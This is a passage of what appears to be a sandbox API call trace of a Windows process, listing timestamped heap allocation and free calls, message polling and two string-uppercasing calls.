hHeap=0x2af0000) returned 1 [0100.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0100.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0100.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0100.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0100.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0100.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0100.566] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0100.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0100.566] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0100.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0100.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0100.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0100.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0100.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0100.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0100.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0100.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0100.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0100.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0100.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0100.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0100.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0100.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0100.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0100.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0100.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0100.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0100.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0100.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0100.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0100.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0100.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0100.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0100.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0100.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99a0 [0100.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0100.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9be0 [0100.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c10 [0100.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b50 [0100.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0100.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0100.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bf8 [0100.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0100.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a60 [0100.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c28 [0100.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b38 [0100.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a741f0 [0100.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0100.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0100.567] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99d0 [0100.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9f10 [0100.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0100.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9d60 [0100.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ca0 [0100.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0100.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0100.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0100.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0100.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0100.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0100.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0100.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0100.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0100.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0100.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0100.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0100.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0100.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0100.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0100.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0100.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0100.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0100.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0100.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0100.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0100.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0100.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0100.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0100.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0100.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0100.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0100.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0100.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0100.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0100.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0100.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0100.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0100.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0100.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0100.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0100.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a741f0 | out: hHeap=0x2af0000) returned 1 [0100.569] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0100.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73db8 | out: hHeap=0x2af0000) returned 1 [0100.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0100.569] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0100.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0100.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0100.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0100.569] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0100.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0100.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0100.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9be0 [0100.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a744c0 [0100.569] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0100.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0100.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0100.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0100.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0100.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0100.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0100.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0100.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0100.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0100.569] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0100.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0100.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0100.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0100.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0100.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0100.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0100.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0100.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0100.570] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0100.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0100.570] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0100.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0100.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0100.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0100.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0100.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0100.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0100.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0100.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0100.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0100.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0100.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0100.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0100.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a744c0 | out: hHeap=0x2af0000) returned 1 [0100.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0100.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0100.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0100.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0100.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0100.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0100.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0100.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0100.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0100.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0100.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0100.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0100.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0100.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0100.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0100.571] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0100.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0100.571] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0100.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0100.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0100.571] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0100.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0100.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0100.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0100.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0100.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0100.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0100.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0100.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0100.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0100.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0100.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0100.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0100.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0100.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0100.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0100.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0100.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0100.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0100.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0100.572] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0100.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0100.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0100.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0100.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0100.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0100.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0100.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0100.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0100.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0100.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0100.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0100.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0100.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0100.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0100.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0100.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0100.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0100.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0100.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0100.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0100.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0100.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0100.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0100.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0100.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0100.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0100.573] HeapFree (in: 